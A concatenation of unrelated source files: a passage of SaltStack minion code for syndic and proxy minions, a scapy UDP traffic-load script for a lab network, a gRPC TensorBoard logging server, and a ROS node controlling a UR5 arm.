if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matchers['glob_match.match'](load['tgt']):
return False
return True
def destroy(self):
'''
Tear down the minion
'''
if self._running is False:
return
self._running = False
if hasattr(self, 'schedule'):
del self.schedule
if hasattr(self, 'pub_channel') and self.pub_channel is not None:
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
# force auth_safemode True because Syndic don't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
self.jids = {}
self.raw_events = []
self.pub_future = None
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
def timeout_handler(*args):
log.warning('Unable to forward pub data: %s', args[1])
return True
with tornado.stack_context.ExceptionStackContext(timeout_handler):
self.local.pub_async(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
io_loop=self.io_loop,
callback=lambda _: None,
**kwargs)
def fire_master_syndic_start(self):
# Send an event to the master that the minion is live
if self.opts['enable_legacy_startup_events']:
# Old style event. Defaults to false in Sodium release.
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start',
sync=False,
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
sync=False,
)
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None and payload['enc'] == 'aes':
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
# If it's not AES, and thus has not been verified, we do nothing.
# In the future, we could add support for some clearfuncs, but
# the syndic currently has no need.
@tornado.gen.coroutine
def reconnect(self):
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
if hasattr(self.pub_channel, 'close'):
self.pub_channel.close()
del self.pub_channel
# if eval_master finds a new master for us, self.connected
# will be True again on successful master authentication
master, self.pub_channel = yield self.eval_master(opts=self.opts)
if self.connected:
self.opts['master'] = master
self.pub_channel.on_recv(self._process_cmd_socket)
log.info('Minion is ready to receive requests!')
raise tornado.gen.Return(self)
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: need a way of knowing if the syndic connection is busted
class SyndicManager(MinionBase):
'''
Make a MultiMaster syndic minion, this minion will handle relaying jobs and returns from
all minions connected to it to the list of masters it is connected to.
Modes (controlled by `syndic_mode`:
sync: This mode will synchronize all events and publishes from higher level masters
cluster: This mode will only sync job publishes and returns
Note: jobs will be returned best-effort to the requesting master. This also means
(since we are using zmq) that if a job was fired and the master disconnects
between the publish and return, that the return will end up in a zmq buffer
in this Syndic headed to that original master.
In addition, since these classes all seem to use a mix of blocking and non-blocking
calls (with varying timeouts along the way) this daemon does not handle failure well,
it will (under most circumstances) stall the daemon for ~15s trying to forward events
to the down master
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(SyndicManager, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.syndic_failover = self.opts.get('syndic_failover', 'random')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
install_zmq()
self.io_loop = ZMQDefaultLoop.current()
else:
self.io_loop = io_loop
# List of events
self.raw_events = []
# Dict of rets: {master_id: {event_tag: job_ret, ...}, ...}
self.job_rets = {}
# List of delayed job_rets which was unable to send for some reason and will be resend to
# any available master
self.delayed = []
# Active pub futures: {master_id: (future, [job_ret, ...]), ...}
self.pub_futures = {}
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = OrderedDict() # mapping of opts['master'] -> syndic
masters = self.opts['master']
if not isinstance(masters, list):
masters = [masters]
for master in masters:
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
auth_wait = opts['acceptance_wait_time']
failed = False
while True:
if failed:
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
log.debug(
"sleeping before reconnect attempt to %s [%d/%d]",
opts['master'],
auth_wait,
self.max_auth_wait,
)
yield tornado.gen.sleep(auth_wait) # TODO: log?
log.debug(
'Syndic attempting to connect to %s',
opts['master']
)
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master(failed=failed)
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
# Send an event to the master that the minion is live
syndic.fire_master_syndic_start()
log.info(
'Syndic successfully connected to %s',
opts['master']
)
break
except SaltClientError as exc:
failed = True
log.error(
'Error while bringing up syndic for multi-syndic. Is the '
'master at %s responding?', opts['master']
)
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
failed = True
log.critical(
'Unexpected error while connecting to %s',
opts['master'], exc_info=True
)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
syndic = self._syndics[master].result() # pylint: disable=no-member
self._syndics[master] = syndic.reconnect()
else:
# TODO: debug?
log.info(
'Attempting to mark %s as dead, although it is already '
'marked dead', master
)
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
successful = False
# Call for each master
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
successful = True
except SaltClientError:
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
if not successful:
log.critical('Unable to call %s on any masters!', func)
def _return_pub_syndic(self, values, master_id=None):
'''
Wrapper to call the '_return_pub_multi' a syndic, best effort to get the one you asked for
'''
func = '_return_pub_multi'
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
log.error(
'Unable to call %s on %s, that syndic is not connected',
func, master
)
continue
future, data = self.pub_futures.get(master, (None, None))
if future is not None:
if not future.done():
if master == master_id:
# Targeted master previous send not done yet, call again later
return False
else:
# Fallback master is busy, try the next one
continue
elif future.exception():
# Previous execution on this master returned an error
log.error(
'Unable to call %s on %s, trying another...',
func, master
)
self._mark_master_dead(master)
del self.pub_futures[master]
# Add not sent data to the delayed list and try the next master
self.delayed.extend(data)
continue
future = getattr(syndic_future.result(), func)(values,
'_syndic_return',
timeout=self._return_retry_timer(),
sync=False)
self.pub_futures[master] = (future, values)
return True
# Loop done and didn't exit: wasn't sent, try again later
return False
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
if self.opts['syndic_failover'] == 'random':
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if not masters:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.job_rets = {}
self.raw_events = []
def reconnect_event_bus(self, something):
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(
self.opts['_minion_conf_file'], io_loop=self.io_loop)
self.local.event.subscribe('')
log.debug('SyndicManager \'%s\' trying to tune in', self.opts['id'])
# register the event sub to the poller
self.job_rets = {}
self.raw_events = []
self._reset_event_aggregation()
future = self.local.event.set_event_handler(self._process_event)
self.io_loop.add_future(future, self.reconnect_event_bus)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
log.trace('Got event %s', mtag) # pylint: disable=no-member
tag_parts = mtag.split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in data:
if 'jid' not in data:
# Not a job return
return
if self.syndic_mode == 'cluster' and data.get('master_id', 0) == self.opts.get('master_id', 1):
log.debug('Return received with matching master_id, not forwarding')
return
master = data.get('master_id')
jdict = self.job_rets.setdefault(master, {}).setdefault(mtag, {})
if not jdict:
jdict['__fun__'] = data.get('fun')
jdict['__jid__'] = data['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if data['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](data['jid'])
)
self.jid_forward_cache.add(data['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if master is not None:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = master
ret = {}
for key in 'return', 'retcode', 'success':
if key in data:
ret[key] = data[key]
jdict[data['id']] = ret
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in data:
self.raw_events.append({'data': data, 'tag': mtag})
def _forward_events(self):
log.trace('Forwarding events') # pylint: disable=no-member
if self.raw_events:
events = self.raw_events
self.raw_events = []
self._call_syndic('_fire_master',
kwargs={'events': events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self._return_retry_timer(),
'sync': False,
},
)
if self.delayed:
res = self._return_pub_syndic(self.delayed)
if res:
self.delayed = []
for master in list(six.iterkeys(self.job_rets)):
values = list(six.itervalues(self.job_rets[master]))
res = self._return_pub_syndic(values, master_id=master)
if res:
del self.job_rets[master]
class ProxyMinionManager(MinionManager):
'''
Create the multi-minion interface but for proxy minions
'''
def _create_minion_object(self, opts, timeout, safe,
io_loop=None, loaded_base_name=None,
jid_queue=None):
'''
Helper function to return the correct type of object
'''
return ProxyMinion(opts,
timeout,
safe,
io_loop=io_loop,
loaded_base_name=loaded_base_name,
jid_queue=jid_queue)
def _metaproxy_call(opts, fn_name):
metaproxy = salt.loader.metaproxy(opts)
try:
metaproxy_name = opts['metaproxy']
except KeyError:
metaproxy_name = 'proxy'
log.trace(
'No metaproxy key found in opts for id %s. '
'Defaulting to standard proxy minion.',
opts['id']
)
metaproxy_fn = metaproxy_name + '.' + fn_name
return metaproxy[metaproxy_fn]
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
If this function is changed, please check Minion._post_master_init
to see if those changes need to be propagated.
ProxyMinions need a significantly different post master setup,
which is why the differences are not factored out into separate helper
functions.
'''
mp_call = _metaproxy_call(self.opts, 'post_master_init')
return mp_call(self, master)
def _target_load(self, load):
'''
Verify that the publication is valid and applies to this minion
'''
mp_call = _metaproxy_call(self.opts, 'target_load')
return mp_call(self, load)
def _handle_payload(self, payload):
mp_call = _metaproxy_call(self.opts, 'handle_payload')
return mp_call(self, payload)
@tornado.gen.coroutine
def _handle_decoded_payload(self, data):
mp_call = _metaproxy_call(self.opts, 'handle_decoded_payload')
return mp_call(self, data)
@classmethod
def _target(cls, minion_instance, opts, data, connected):
mp_call = _metaproxy_call(opts, 'target')
return mp_call(cls, minion_instance, opts, data, connected)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_return')
return mp_call(cls, minion_instance, opts, data)
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
mp_call = _metaproxy_call(opts, 'thread_multi_return')
return mp_call(cls, minion_instance, opts, data)
class SProxyMinion(SMinion):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SProxyMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def gen_modules(self, initial_load=False):
'''
Tell the minion to reload the execution modules
CLI Example:
.. code-block:: bash
salt '*' sys.reload_modules
'''
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
saltenv=self.opts['saltenv'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
errmsg = (
'No "proxy" configuration key found in pillar or opts '
'dictionaries for id {id}. Check your pillar/options '
'configuration and contents. Salt-proxy aborted.'
).format(id=self.opts['id'])
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
if 'proxy' not in self.opts:
self.opts['proxy'] = self.opts['pillar']['proxy']
# Then load the proxy module
self.proxy = salt.loader.proxy(self.opts)
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=False, proxy=self.proxy)
self.returners = salt.loader.returners(self.opts, self.functions, proxy=self.proxy)
self.matchers = salt.loader.matchers(self.opts)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts, self.functions, proxy=self.proxy)
fq_proxyname = self.opts['proxy']['proxytype']
# we can then sync any proxymodules down from the master
# we do a sync_all here in case proxy code was installed by
# SPM or was manually placed in /srv/salt/_modules etc.
self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
self.functions.pack['__proxy__'] = self.proxy
self.proxy.pack['__salt__'] = self.functions
self.proxy.pack['__ret__'] = self.returners
self.proxy.pack['__pillar__'] = self.opts['pillar']
# Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
self.proxy.pack['__utils__'] = self.utils
# Reload all modules so all dunder variables are injected
self.proxy.reload_modules()
if ('{0}.init'.format(fq_proxyname) not in self.proxy
or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
'Check your proxymodule. Salt-proxy aborted.'
log.error(errmsg)
self._running = False
raise SaltSystemExit(code=salt.defaults.exitcodes.EX_GENERIC, msg=errmsg)
self.module_executors = self.proxy.get('{0}.module_executors'.format(fq_proxyname), lambda: [])()
proxy_init_fn = self.proxy[fq_proxyname + '.init']
proxy_init_fn(self.opts)
self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
# Sync the grains here so the proxy can communicate them to the master
self.functions['saltutil.sync_grains'](saltenv='base')
self.grains_cache = self.opts['grains']
self.ready = True
|
h1_h2_traffic_load.py | #!/usr/bin/python
# Copyright 2020-2021 PSNC
# Author: Damian Parniewicz
#
# Created in the GN4-3 project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from scapy.all import Ether, IP, sendp, get_if_hwaddr, get_if_list, TCP, Raw, UDP
from scapy.config import conf
import sys
from time import sleep, time
from multiprocessing import Process
src_mac = "00:00:00:00:01:01"
data = "ABCDFE"
src_ip = "10.0.1.1"
dst_mac = "00:00:00:00:02:02"
dst_ip = "10.0.2.2"
interface = [i for i in get_if_list() if "eth0" in i][0]
s = conf.L2socket(iface=interface)
p = Ether(dst=dst_mac,src=src_mac)/IP(frag=0,dst=dst_ip,src=src_ip)
p = p/UDP(sport=0x11FF, dport=0x22FF)/Raw(load=data)
def send(id):
pkt_cnt = 0
last_sec = time()
while True:
s.send(p)
pkt_cnt += 1
if time()-last_sec > 1.0:
print("[%d]Pkt/s: %d" % (id, pkt_cnt))
pkt_cnt = 0
last_sec = time()
if __name__ == "__main__":
procs = []
for id in range(3):
proc = Process(target=send, args=(id,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
ExperimentServer.py | import os
import time
import grpc
import multiprocessing
import traceback
import numpy as np
from signal import signal, SIGTERM
from concurrent import futures
from threading import Lock
from readerwriterlock import rwlock
from typing import Any, Dict
import tensorboardX
from malib.rpc.chunk import deserialize, recv_chunks, deserialize_image
from malib.rpc.proto import exprmanager_pb2, exprmanager_pb2_grpc
from malib.utils.convert import (
utc_to_str,
dump_dict,
grpc_struct_to_dict,
tensor_to_dict,
)
class _ConcurrentTable:
def __init__(self):
self.lock = rwlock.RWLockFair()
# {name, idx}, {idx, writer}
self.table = [{}, {}]
def close(self):
for idx, (lock, writer) in self.table[1].items():
with lock:
writer.close()
def put(self, name):
idx = -1
with self.lock.gen_rlock():
if name in self.table[0]:
idx = self.table[0][name]
if idx == -1:
with self.lock.gen_wlock():
idx = len(self.table[0])
self.table[0][name] = idx
writer = tensorboardX.SummaryWriter(name)
self.table[1][idx] = (Lock(), writer)
return idx
def get(self, index):
with self.lock.gen_rlock():
wlock, writer = self.table[1][index]
return wlock, writer
class ExperimentManagerRPCServicer(exprmanager_pb2_grpc.ExperimentManagerRPCServicer):
def __init__(
self,
global_writer_table,
logdir="./",
flush_freq: int = -1,
debug=False,
verbose=False,
):
super().__init__()
self.root_dir = logdir
self.table = global_writer_table
self.debug = debug
self.verbose = verbose
def CreateTable(self, table_name, context):
if self.debug:
print(
"Get CreateTable Request:\n", dump_dict(grpc_struct_to_dict(table_name))
)
rec_path = os.path.join(self.root_dir, table_name.primary, table_name.secondary)
try:
os.makedirs(rec_path)
except Exception as e:
if self.verbose:
print("Error detected in making directory ", e)
idx = -1
try:
idx = self.table.put(rec_path)
except:
traceback.print_exc()
return exprmanager_pb2.TableKey(key=idx, time=time.time())
def SendText(self, text, context):
if self.debug:
print("Get SendText Request:\n", text.text)
try:
lock, writer = self.table.get(text.key)
with lock:
writer.add_text(
text.tag, text.text, global_step=text.step, walltime=text.time
)
return exprmanager_pb2.SendReply(status=1, time=time.time())
except Exception as e:
if self.verbose:
print("InternalError detected:", e)
return exprmanager_pb2.SendReply(status=0, time=time.time())
def SendScalar(self, scalar, context):
if self.debug:
print("Get SendScalar Request:\n", dump_dict(grpc_struct_to_dict(scalar)))
try:
lock, writer = self.table.get(scalar.key)
scalar_type = scalar.WhichOneof("ScalarType")
val = getattr(scalar, scalar_type)
with lock:
writer.add_scalar(
scalar.tag, val, global_step=scalar.step, walltime=scalar.time
)
return exprmanager_pb2.SendReply(status=1, time=time.time())
except Exception as e:
if self.verbose:
print("InternalError detected:", e)
return exprmanager_pb2.SendReply(status=0, time=time.time())
def SendImage(self, binary_iterator, context):
if self.debug:
print("Get SendImage Request")
try:
serial_img, fields = recv_chunks(binary_iterator, "blocks")
lock, writer = self.table.get(fields["key"])
# print(fields["tensor"])
if "tensor" in fields and not fields["tensor"]:
img = deserialize_image(serial_img)
img = np.array(img)
else:
img = deserialize(serial_img)
if self.debug:
print(img.shape)
img = np.transpose(img[:, :, 0:3], [2, 0, 1])
with lock:
writer.add_image(
tag=fields["tag"],
img_tensor=img,
global_step=fields["step"],
walltime=fields["time"],
)
return exprmanager_pb2.SendReply(status=1, time=time.time())
except Exception as e:
if self.verbose:
print(traceback.format_exc())
print("InternalError detected:", e)
return exprmanager_pb2.SendReply(status=0, time=time.time())
def SendObj(self, binary_iterator, context):
if self.debug:
print("Get SendObj Request")
print("Receiver currently act as method: send scalars")
try:
serial_obj, fields = recv_chunks(binary_iterator, "blocks")
obj = deserialize(serial_obj)
lock, writer = self.table.get(fields["key"])
# Received internal info, currently only payoff
if fields["tag"] == "__Payoff__":
with lock:
writer.add_text(
"payoff_update_info",
"\n".join(
[
f"Update-SendTime-{utc_to_str(fields['time'])}:\n",
"* Population:\n",
"| AgentName |"
+ "".join(
[
f" {agent} |"
for agent, _ in obj["Population"].items()
]
),
"| :-: |"
+ "".join(
[" :-: |" for _, _ in obj["Population"].items()]
),
"| Policy |"
+ "".join(
[
f" {pid} |"
for _, pid in obj["Population"].items()
]
)
+ "\n",
"* Reward:\n",
"| AgentName | "
+ "".join(
f" {agent} |" for (agent, _) in obj["Agents-Reward"]
),
"| :-: |"
+ "".join([" :-: |" for _, _ in obj["Agents-Reward"]]),
"| Reward |"
+ "".join(
f" {reward} |"
for (_, reward) in obj["Agents-Reward"]
)
+ "\n",
]
),
global_step=fields["step"],
walltime=fields["time"],
)
else:
def _flatten_obj(obj: Dict):
res = {}
for k, v in obj.items():
if isinstance(v, Dict):
temp_dict = _flatten_obj(v)
for tk, tv in temp_dict.items():
res[f"{k}/{tk}"] = tv
elif isinstance(v, float):
res[k] = v
else:
raise NotImplementedError
return res
with lock:
# TODO(ming): flatten obj key
obj = _flatten_obj(obj)
for k, v in obj.items():
writer.add_scalar(
f"{fields['tag']}/{k}",
v,
global_step=fields["step"],
walltime=fields["time"],
)
return exprmanager_pb2.SendReply(status=1, time=time.time())
except Exception as e:
if self.verbose:
print("InternalError detected:", e)
return exprmanager_pb2.SendReply(status=0, time=time.time())
def SendBinaryTensor(self, binary, context):
"""
Receive a tensor sent over rpc connection.
In current implementation, the tensor is only printed in command shell
since tensorboardX does not support adding tensors.
Future: needed in sacred version experiment manager
Parameters:import matplotlib.backends.backend_agg as plt_backend_agg
binary: received binary rpc structs as predefined in exprmanager.proto
context: rpc context
"""
if self.debug:
print("Get SendBinaryTensor Request")
try:
serial_tensor, key = recv_chunks(binary, "blocks")
tensor = deserialize(serial_tensor)
if self.debug:
field_description = grpc_struct_to_dict(binary, skip_fields=["blocks"])
print(field_description.update(tensor_to_dict(tensor)))
return exprmanager_pb2.SendReply(status=1, time=time.time())
except Exception as e:
if self.verbose:
print("InternalError detected:", e)
return exprmanager_pb2.SendReply(status=0, time=time.time())
class ExprManagerServer:
table = None
def __init__(
self, port, logdir="./", grace=5, max_workers=10, debug=False, verbose=False
):
self.port = port
self.grace = grace
self.server = grpc.server(futures.ThreadPoolExecutor(max_workers=max_workers))
self.table = _ConcurrentTable()
exprmanager_pb2_grpc.add_ExperimentManagerRPCServicer_to_server(
ExperimentManagerRPCServicer(
global_writer_table=self.table,
logdir=logdir,
debug=debug,
verbose=verbose,
),
self.server,
)
self.server.add_insecure_port(self.port)
def start(self):
self.server.start()
def wait(self):
self.server.wait_for_termination()
def stop(self):
self.server.stop(grace=self.grace)
self.table.close()
def _create_logging(**kwargs):
s = ExprManagerServer(**kwargs)
s.start()
print("Logger server up!")
def terminate_server(*_):
s.stop()
print("Logging server stop")
signal(SIGTERM, terminate_server)
s.wait()
def start_logging_server(**kwargs):
process = multiprocessing.Process(target=_create_logging, kwargs=kwargs)
return process
|
node_t5_ur5_2.py | #! /usr/bin/env python
"""
Controls the UR5 near the bins to pick up boxes from the conveyor.
Borrows methods from :mod:`lib_task5` to aid execution, and uses
multithreading to operate the UR5_2 and conveyor simultaneously.
"""
import os
import threading
import json
import datetime
from math import radians
import rospy
from rospy.exceptions import ROSInterruptException
import geometry_msgs.msg
from hrwros_gazebo.msg import LogicalCameraImage
from std_msgs.msg import String
from lib_task5 import Ur5Moveit # The library for the UR5s
from node_iot_action_client import RosIotBridgeActionClient # ROS-IoT Bridge Client
def env_data():
"""
Data of all environment-specific parameters:
1. Vacuum Gripper Width
2. Box Size
3. Home Position Joint angles for the UR5
:return: All environment-specific data specified in the function.
:rtype: list
"""
box_length = 0.15 # Length of the box
vacuum_gripper_width = 0.117 # Vacuum Gripper Width
home_joint_angles = [radians(0),
radians(-120),
radians(-85),
radians(-65),
radians(90),
radians(0)]
# Return data when called
return [box_length,
vacuum_gripper_width, home_joint_angles]
def pose_set(trans, rot):
"""
Assigns pose values w.r.t the world-frame to a PoseStamped object.
:arg list(float) trans: Translation Values.
:arg list(float) rot: RPY Rotation Values.
:returns: The complete pose with values.
:rtype: PoseStamped object
"""
# If you want to override any values, use this
override = [trans, [-0.5, -0.5, 0.5, 0.5]]
if override:
trans = override[0]
rot = override[1]
pose = geometry_msgs.msg.PoseStamped()
pose.header.frame_id = 'world'
pose.pose.position.x = trans[0]
pose.pose.position.y = trans[1]
pose.pose.position.z = trans[2]
pose.pose.orientation.x = rot[0]
pose.pose.orientation.y = rot[1]
pose.pose.orientation.z = rot[2]
pose.pose.orientation.w = rot[3]
return pose
def box_plan(box_name, box_length, vacuum_gripper_width):
"""
Pick-planning for the boxes.
:arg str box_name: The name of the box as detected through the Logical Camera.
:arg float box_length: The size of the box in metres.
:arg float vacuum_gripper_width: The width of the vacuum gripper.
"""
# Offset for end effector placement
delta = vacuum_gripper_width + (box_length / 2)
# Obtaining the TF transform of the box
(box_trans, box_rot) = UR5.tf_listener.lookupTransform("/world",
"/logical_camera_2_%s_frame" % box_name,
rospy.Time(0))
# Execute pick operation
box_pose = pose_set(box_trans, box_rot) # Collating pose values
box_pose.pose.position.z = box_pose.pose.position.z + delta # Adding Z Offset
UR5.hard_go_to_pose(box_pose, 3) # Executing pick travel
# Activate Vacuum Gripper
os.system\
(
'rosservice call /eyrc/vb/ur5/activate_vacuum_gripper/ur5_2 "activate_vacuum_gripper: true"\n'
)
# Travelling back to home
UR5.hard_set_joint_angles(ENV_VALUES[2], 3)
os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 100"')
# Log the operation
rospy.logwarn(
"Package '%s' picked!" % box_name)
class UR5Two(object):
"""
Class for the module.
:var float package_pos: Stores the conveyor position of the detected box.
:var str package_name: Stores models' names from :meth:`camera_callback`.
:var list(str) package_colours: Stores package colours from :meth:`package_callback`.
:var bool ready_flag: Start-stop variable for operation of the UR5_2.
:var dict order: The current order to be shipped.
:var rospy.Subscriber sub_package_colour: Subscriber to receive the list of colours
from the Logical Camera.
"""
def __init__(self):
"""
Constructor containing essential data.
"""
self.package_pos = 0 # Stores the conveyor position of the detected box
self.package_name = '' # String to store models' names from camera_callback()
self.package_colours = [] # String list to store packages colours from package_callback()
self.ready_flag = False # Start-stop variable
self.order = {} # The current dispatched order to be shipped
self.sub_package_colour = rospy.Subscriber('/package_colour',
String,
self.package_callback)
rospy.Subscriber('/eyrc/vb/logical_camera_2',
LogicalCameraImage,
self.camera_callback)
rospy.Subscriber('/dispatched_order', String, self.order_callback)
def smart_stop(self):
"""
Multithreading function for conveyor start-stop.
"""
# Conveyor Signal variable
power_flag = False
while True:
if ('packagen' in self.package_name) and (abs(self.package_pos) < 0.4):
if power_flag:
os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 0"')
self.ready_flag = True
power_flag = False
elif not power_flag:
os.system('rosservice call /eyrc/vb/conveyor/set_power "power: 100"')
power_flag = True
def camera_callback(self, msg_camera):
"""
Callback function for Conveyor Logical Camera Subscriber
:arg LogicalCameraImage msg_camera:
Data about all the objects detected by the Logical Camera.
"""
if msg_camera.models:
if len(msg_camera.models) == 1:
self.package_name = msg_camera.models[0].type
self.package_pos = msg_camera.models[0].pose.position.y
else:
self.package_name = msg_camera.models[1].type
self.package_pos = msg_camera.models[1].pose.position.y
def order_callback(self, msg_order):
"""
Callback function to receive the data of the currently dispatched order from UR5_1.
:arg str msg_order: A JSON string dump of the order data dictionary.
"""
self.order = json.loads(msg_order.data)
def package_callback(self, msg_package_list):
"""
Callback function for the package colour decoder Subscriber.
:arg list(str) msg_package_list: CSV-formatted list of all the package colours in order.
"""
temp_var = msg_package_list.data.split(',') # Converting the CSV
if len(temp_var) == 9 and 'NA' not in temp_var:
rospy.logwarn("Configuration stored:")
rospy.logwarn(temp_var)
self.sub_package_colour.unregister()
self.package_colours = temp_var
